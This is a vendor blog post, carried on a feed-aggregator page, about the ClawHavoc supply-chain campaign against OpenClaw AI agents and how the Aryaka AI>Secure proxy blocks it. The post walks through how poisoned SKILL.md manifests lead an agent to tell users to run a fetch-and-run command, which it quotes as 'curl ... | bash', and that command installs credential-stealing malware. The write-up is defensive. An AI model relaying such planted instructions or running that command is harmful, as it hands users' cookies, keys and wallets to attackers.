惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

D
Darknet – Hacking Tools, Hacker News & Cyber Security
AI
AI
S
Security Affairs
S
Secure Thoughts
Attack and Defense Labs
Attack and Defense Labs
Application and Cybersecurity Blog
Application and Cybersecurity Blog
H
Heimdal Security Blog
Forbes - Security
Forbes - Security
Security Archives - TechRepublic
Security Archives - TechRepublic
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Spread Privacy
Spread Privacy
C
Cybersecurity and Infrastructure Security Agency CISA
Latest news
Latest news
T
Tor Project blog
I
Intezer
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Project Zero
Project Zero
V2EX - 技术
V2EX - 技术
V
Vulnerabilities – Threatpost
L
Lohrmann on Cybersecurity
C
CXSECURITY Database RSS Feed - CXSecurity.com
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Hacker News: Ask HN
Hacker News: Ask HN
S
Schneier on Security
T
Threat Research - Cisco Blogs
Webroot Blog
Webroot Blog
T
Threatpost
Help Net Security
Help Net Security
W
WeLiveSecurity
Know Your Adversary
Know Your Adversary
WordPress大学
WordPress大学
L
LINUX DO - 最新话题
月光博客
月光博客
PCI Perspectives
PCI Perspectives
小众软件
小众软件
爱范儿
爱范儿
博客园 - Franky
Security Latest
Security Latest
Microsoft Azure Blog
Microsoft Azure Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Stack Overflow Blog
Stack Overflow Blog
Google DeepMind News
Google DeepMind News
Scott Helme
Scott Helme
P
Privacy International News Feed
Y
Y Combinator Blog
P
Palo Alto Networks Blog
M
MIT News - Artificial intelligence
N
Netflix TechBlog - Medium

Aryaka

Secure SD‑WAN And Unified SASE: What AI‑Driven Enterprises Need To Know Before Leaving MPLS How Unified SASE Improves China Connectivity: Performance, Security, And Compliance | Aryaka Blog Why China Connectivity Remains A Major Enterprise Challenge For Global IT Teams | Aryaka Blog The Market Has Spoken (Twice): Why Enterprises Choose Aryaka For SD‑WAN And Unified SASE AI Performance Is A Network Problem, Not Just Compute From ZIP File To Crpx0 Ransomware: Anatomy Of A Multi-Stage Attack Aryaka AI-Ready Network: Why Your WAN Fails For AI Workloads AI Is Redefining Cybersecurity: How CISOs Can Stay Ahead In An AI‑Driven Threat Landscape | Aryaka Blog Aryaka Named Leader In G2 Spring 2026 For SD-WAN & Cloud Security Governing Tens Of Thousands Of AI Agents: Why Policy Chaining Matters For Scalable Runtime Governance | Aryaka Blog Enterprise AI Agent Governance: Build, Deployment & Runtime Explained Is Your Outdated Network Holding Your Business Back? Why Modernization Matters For Cloud, Security, And IT Costs | Aryaka Blog Kernel In The Crosshairs: How The BlackSanta EDR-Killer Campaign Targets Recruitment Workflows | Aryaka Blog Addressing The “God Key” Challenge In Agentic AI For MCP Servers: Why You Need MCP-Aware, AI-Aware ZTNA | Why Browser Security Alone Will Not Protect Us In The Agentic AI Era Aryaka Modern Workplaces Need A New Meaning Of “Site”: How AI>Secure Uses Logical & Physical Sites For Consistent GenAI Security | Aryaka Blog How Modern Security Platforms Organize Rules | SASE & SSE Securing OpenClaw: Why ZTNA Is Critical For Enterprise AI Agent Authentication
Securing OpenClaw Agents From ClawHavoc Supply-Chain Attacks With AI-Driven Protection
2026-02-18 · via Aryaka

Blog 2 Securing OpenClaw Against Banner

As of February 2026, OpenClaw (formerly Clawdbot and Moltbot ) is a popular platform for autonomous AI agents. Its “sovereign” architecture, which gives AI direct access to file systems and terminals, significantly increases its attack surface—leading to elevated risks, most notably illustrated by the ClawHavoc supply-chain campaign, which exposed thousands of deployments to potential compromise.

This article reviews OpenClaw’s vulnerabilities and explains how Aryaka AI>Secure provides robust, multi-layered risk mitigation.

OpenClaw Vulnerabilities & The ClawHavoc Context

OpenClaw is vulnerable due to three main factors:

  • System-Level Access: Agents can execute shell commands and access credentials.
  • Untrusted Ingestion: Agents process third-party content, exposing them to prompt injection.
  • Autonomous Communication: Agents can send data externally without supervision.

ClawHavoc is a supply-chain attack that exploited this ecosystem. In February 2026, researchers discovered about 12% of ClawHub skills were malicious, disguised as useful tools but actually stealing digital identities.

How ClawHavoc Works: The Anatomy of an Infection

ClawHavoc is a stateful, social-engineering attack that exploits the way OpenClaw ingests instructions. It follows a repeatable, highly effective kill chain:

  • Step 1: The Poisoned Manifest (SKILL.md): Attackers upload a skill to ClawHub. The core of the attack is the SKILL.md file. It includes a “Prerequisites” section that tells the agent (and the user) that a specific script must be run to “initialize” the tool.
  • Step 2: Social Engineering via LLM: When you ask your agent to use the skill, it reads the malicious SKILL.md into its context. The LLM then generates a helpful-sounding response: “To enable this feature, please run this command in your terminal: curl -sL https://glot.io/raw/snippet | bash.”
  • Step 3: Malware Payload Delivery: If the user executes the command, it downloads a second-stage payload—typically Atomic Stealer (AMOS) or a keylogger. This malware raids browser cookies, keychains, and the OpenClaw environment files for API keys and crypto wallets.

Using Aryaka AI>Secure to Stop ClawHavoc

As a deep-packet, AI-aware MITM proxy, Aryaka AI>Secure intercepts traffic at every stage of the ClawHavoc attack chain.

Method 1: Blocking the Malicious Skill Download

When a user runs clawhub install, AI>Secure decrypts the HTTPS traffic from the registry.

  • The Protection: It doesn’t just see a file; it parses the Markdown content of the SKILL.md. It uses semantic inspection to identify “Toxic Instructions,” such as hidden shell commands or links to known snippet-sharing sites used in the ClawHavoc campaign.
  • The Result: It blocks the download at the network edge, preventing the malicious instructions from ever reaching the agent’s memory.

Method 2: Response Semantic Filtering (Instruction Defense)

If a bad skill is already on your machine, AI>Secure provides a second layer of defense by inspecting the LLM’s output.

  • The Protection: When the LLM tells the user to “Run this script to enable the tool,” AI>Secure’s semantic engine recognizes this as “Installer Fraud.” It identifies that the AI is being manipulated into tricking a human into a dangerous action.
  • The Result: The proxy redacts the command from the chat stream or blocks the message entirely, replacing it with a security warning in the user’s interface.

Method 3: Proactive URL Filtering & SWG (Payload Defense)

If the user attempts to manually run a malicious curl command or download a “prerequisite” ZIP, AI>Secure’s Secure Web Gateway (SWG) functionality intervenes.

  • The Protection: AI>Secure utilizes a real-time URL Intelligence Feed to track phishing domains and malware-hosting infrastructure.
  • The Result: When the agent or user tries to reach the specific URL hosting the malware payload (like glot.io or webhook.site), the proxy identifies the destination as “Malicious” or “High-Risk” and kills the request instantly. This prevents the actual malware from ever being fetched.

Method 4: Runtime Tool & Data Lockdown

If the malware manages to execute, AI>Secure acts as the final gatekeeper for your data.

  • The Protection: It understands the MCP (Model Context Protocol) calls. If an infected agent tries to execute a shell command to exfiltrate data, AI>Secure identifies the anomalous destination.
  • The Result: Its Next-Gen DLP (Data Loss Prevention) scans all outbound data for “Secrets” (API keys, SSH headers). If it sees your private credentials leaving the network, it terminates the session and alerts the security team.

Conclusion

The ClawHavoc crisis proves that for autonomous agents, the prompt and the skill manifest are the new perimeters. By leveraging an AI-centric proxy like Aryaka AI>Secure, you ensure that your OpenClaw agent remains a tool for productivity rather than a gateway for attackers.